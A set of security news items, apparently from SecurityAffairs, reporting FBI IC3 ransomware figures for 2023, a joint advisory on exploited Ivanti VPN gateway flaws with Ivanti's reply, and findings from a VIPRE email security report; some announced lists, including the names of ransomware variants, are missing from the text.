In 2023, IC3 received 2,825 ransomware complaints, resulting in adjusted losses exceeding $59.6 million.
The IC3 reported 1,193 ransomware complaints from organizations within a critical infrastructure sector. Among the 16 critical infrastructure sectors, IC3 reports indicated that 14 sectors had at least one member affected by a ransomware attack in 2023.
The five top ransomware variants reported to the IC3 that affected an organization of a critical infrastructure sector were , , , , and .
“Last year also saw notable achievements for law enforcement. The FBI’s commitment to assisting cyber victims and fostering partnerships allowed for the continued success of IC3’s Recovery Asset Team (RAT). Established in 2018, RAT streamlines communications with financial institutions and FBI field offices to facilitate the freezing of funds for victims.” concludes the report. “In 2023, IC3’s RAT initiated the Financial Fraud Kill Chain (FFKC) on 3,008 incidents, with potential losses of $758.05 million. A monetary hold was placed on $538.39 million, representing a success rate of 71%.”
(SecurityAffairs – hacking, IC3)
The Five Eyes intelligence alliance issued a joint cybersecurity advisory warning of threat actors exploiting known vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure gateways.
The advisory details the in-the-wild exploitation of three Connect Secure and Policy Secure vulnerabilities that multiple threat actors are chaining to bypass authentication, craft malicious requests, and execute arbitrary commands with elevated privileges.
CISA’s advisory also warns that Ivanti’s Integrity Checker Tool (ICT) is not sufficient to detect a compromise. Government experts also reported that exploitation of the flaws can allow threat actors to maintain root-level persistence on the appliance.
“The advisory describes cyber threat actor exploitation of multiple previously identified Connect Secure and Policy Secure vulnerabilities, which threat actors can exploit in a chain to bypass authentication, craft malicious requests, and execute arbitrary commands with elevated privileges.” reads the advisory. “Additionally, the advisory describes two key CISA findings:
The advisory includes mitigations and indicators of compromise (IOCs).
The advisory describes each of the vulnerabilities in detail. Ivanti has also addressed two additional high-severity vulnerabilities in the same products.
“The authoring organizations encourage network defenders to (1) assume that user and service account credentials stored within the affected Ivanti VPN appliances are likely compromised, (2) hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory, (3) run Ivanti’s most recent external ICT, and (4) apply available patching guidance provided by Ivanti as version updates become available.” continues the advisory. “If a potential compromise is detected, organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.”
In response to the joint advisory and its findings, Ivanti published an update stating that the technical findings observed in CISA’s lab have not been observed in real-world scenarios and are not considered viable in live customer environments. CISA and the other agencies recommend that defenders use Ivanti’s recently released external Integrity Checker Tool (ICT), made available on February 27.
“As part of our exhaustive investigation into the recent attack against our customers, Ivanti and Mandiant released findings today regarding evolving threat actor tactics, techniques and procedures (TTPs). These findings were identified in the ongoing analysis of the previously disclosed vulnerabilities affecting Ivanti Connect Secure, Policy Secure and ZTA gateways, and include potential persistence techniques that we are monitoring, even though to date they have not been deployed successfully in the wild.” reads Ivanti’s update.
“Importantly, this is not a new CVE, and we and our security and government partners are not aware of any instances of successful threat actor persistence following implementation of security updates and factory resets.“
(SecurityAffairs – hacking, CISA)
Email remains one of the primary attack surfaces organizations must defend. VIPRE Security Group’s latest report, “Email Security in 2024: An Expert Insight into Email Threats,” examines the tactics and technologies cybercriminals are using this year.
Drawing on an analysis of nearly a billion malicious emails, the report describes these threats in detail, helping organizations understand how email-based attacks work. Some of the key findings follow.
In an exhaustive review, VIPRE processed 7.2 billion emails globally, identifying approximately 950.39 million as malicious.
The VIPRE Email Security Link Isolation feature, akin to URL sandboxing, showcased its efficacy by securing over 41.9 million links clicked by users.
YARA rules were pivotal in detecting millions of malicious attempts spotlighting statistical patterns and malware family indicators. The adaptability of these rules contributed to a marked increase in malware detection, particularly in the fourth quarter, emphasizing the necessity of continuous evolution in email security tactics.
The landscape of email threats continues to evolve, with VIPRE’s report shedding light on several alarming trends:
Phishing remains a dominant tactic in the cybercriminal arsenal, with the email report providing crucial insights:
Techniques Evolve: The majority of phishing attempts (71%) rely on deceptive links, but attachments (22%) and predatory QR codes (7%) are rising phishing tactics to watch out for.
Who’s Being Spoofed?: Microsoft tops the list of spoofed entities, highlighting the importance of vigilance against seemingly reputable sources.
Link and Attachment Tactics
These insights emphasize the critical importance of remaining alert and adopting comprehensive security measures to mitigate the risks posed by the evolving landscape of phishing threats.
The Email Security in 2024 report illuminates several specific threats that have been particularly prominent or are on the rise:
Cybercriminals are exploiting Google Groups to distribute fake order confirmations, tricking recipients into providing personal information under the guise of canceling a non-existent order. This scam cleverly manipulates trust and the routine nature of order confirmations to breach personal security.
The report highlights an uptick in scam emails tied to holidays, leveraging the seasonal hustle to bait users into phishing traps. These scams often use newly registered domains to evade detection, exploiting users’ lowered guard during festive periods.
A significant rise in the use of .eml file attachments for phishing attacks has been noted. These attachments, which can easily bypass traditional security measures due to their rarity in business communication, contain malicious content that, when opened, can compromise the recipient’s security.
The malware landscape has shifted, with families such as Qbot, RedLine, and AgentTesla taking the lead in different quarters. These families, which mainly target Windows systems, highlight the need for vigilance against attachments and links that may carry them.
These highlighted threats underscore the adaptability of attackers and the critical need for advanced, proactive security measures to protect against these sophisticated tactics.
Looking to the horizon of 2024, the Email Security in 2024 Report outlines several key predictions that underscore the evolving nature of email threats:
These predictions highlight the need for continuous innovation in email security solutions and practices to counteract these advancing threats, ensuring that businesses and individuals can safeguard their digital communications against the next wave of cyber attacks.
About the Author: Stefanie. Having spent her career in various capacities and industries under the “high tech” umbrella, Stefanie is passionate about the trends, challenges, solutions, and stories of existing and emerging technologies. A storyteller at heart, she considers herself one of the lucky ones: someone who gets to make a living doing what she loves.
(SecurityAffairs – hacking, Email Security)